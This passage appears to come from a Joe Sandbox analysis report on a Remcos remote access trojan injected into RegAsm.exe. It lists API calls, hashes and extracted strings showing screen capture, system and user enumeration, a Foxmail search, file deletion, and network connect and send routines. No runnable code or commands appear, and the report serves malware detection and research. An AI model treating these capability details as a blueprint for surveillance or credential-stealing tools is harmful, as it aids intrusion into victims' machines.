                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                          • String ID:
                          • API String ID: 3950776272-0
                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: SystemTimes$Sleep__aulldiv
                          • String ID:
                          • API String ID: 188215759-0
                          • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                          • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                          • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                          • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                          APIs
                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,007C9238), ref: 004338DA
                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Context$AcquireRandomRelease
                          • String ID:
                          • API String ID: 1815803762-0
                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                          APIs
                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Name$ComputerUser
                          • String ID:
                          • API String ID: 4229901323-0
                          • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                          • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                          • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                          • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                          • Instruction Fuzzy Hash:

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                          • String ID: 0o|$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-7B1J99$Software\$User$`.|$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                          • API String ID: 2830904901-4222066092
                          • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                          • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                          • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                          • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                          Control-flow Graph

                          APIs
                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$ErrorLastLocalTime
                          • String ID: | $%I64u$0o|$5.1.2 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-7B1J99$TLS Off$TLS On $`.|$dMG$hlight$name$NG$NG$PG$PG$PG
                          • API String ID: 524882891-2816713678
                          • Opcode ID: dce4dbc1c9552ef97593c32f0aba4e48013e2fbb171476585201c2d95aca7576
                          • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                          • Opcode Fuzzy Hash: dce4dbc1c9552ef97593c32f0aba4e48013e2fbb171476585201c2d95aca7576
                          • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                          Control-flow Graph

                          APIs
                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                          • DeleteDC.GDI32(00000000), ref: 00418F65
                          • DeleteDC.GDI32(00000000), ref: 00418F68
                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                          • GetCursorInfo.USER32(?), ref: 00418FE2
                          • GetIconInfo.USER32 ref: 00418FF8
                          • DeleteObject.GDI32(?), ref: 00419027
                          • DeleteObject.GDI32(?), ref: 00419034
                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                          • DeleteDC.GDI32(?), ref: 004191B7
                          • DeleteDC.GDI32(00000000), ref: 004191BA
                          • DeleteObject.GDI32(00000000), ref: 004191BD
                          • GlobalFree.KERNEL32(?), ref: 004191C8
                          • DeleteObject.GDI32(00000000), ref: 0041927C
                          • GlobalFree.KERNELBASE(?), ref: 00419283
                          • DeleteDC.GDI32(?), ref: 00419293
                          • DeleteDC.GDI32(00000000), ref: 0041929E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                          • String ID: DISPLAY
                          • API String ID: 4256916514-865373369
                          • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                          • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                          • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                          • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                          • String ID: /stext "$0TG$0TG$NG$NG
                          • API String ID: 1223786279-2576077980
                          • Opcode ID: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                          • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                          • Opcode Fuzzy Hash: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                          • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                          Control-flow Graph

                          APIs
                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                          • lstrlenW.KERNEL32(?), ref: 100014C5
                          • lstrlenW.KERNEL32(?), ref: 100014E0
                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                          • String ID: )$Foxmail$ProgramFiles
                          • API String ID: 672098462-2938083778
                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                          Control-flow Graph

                          APIs
                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                          • API String ID: 2490988753-744132762

                          Control-flow Graph (rendered as an image in the original report; not reproduced here)
                          APIs
                          • connect.WS2_32(FFFFFFFF,00D64950,00000010), ref: 004048E0
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                          • WSAGetLastError.WS2_32 ref: 00404A21
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                          • API String ID: 994465650-2151626615

                          Control-flow Graph

                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                          • CloseHandle.KERNEL32(?), ref: 00404E4C
                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                          • String ID:
                          • API String ID: 3658366068-0

                          Control-flow Graph (rendered as an image in the original report; not reproduced here)
                          APIs
                          • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: LongNamePath
                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                          • API String ID: 82841172-425784914

                          Control-flow Graph (rendered as an image in the original report; not reproduced here)
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                          • __freea.LIBCMT ref: 0044AEB0
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • __freea.LIBCMT ref: 0044AEB9
                          • __freea.LIBCMT ref: 0044AEDE
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                          • String ID:
                          • API String ID: 3864826663-0
                          APIs
                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                          • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          • API String ID: 782494840-2070987746
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                          • __freea.LIBCMT ref: 10008A08
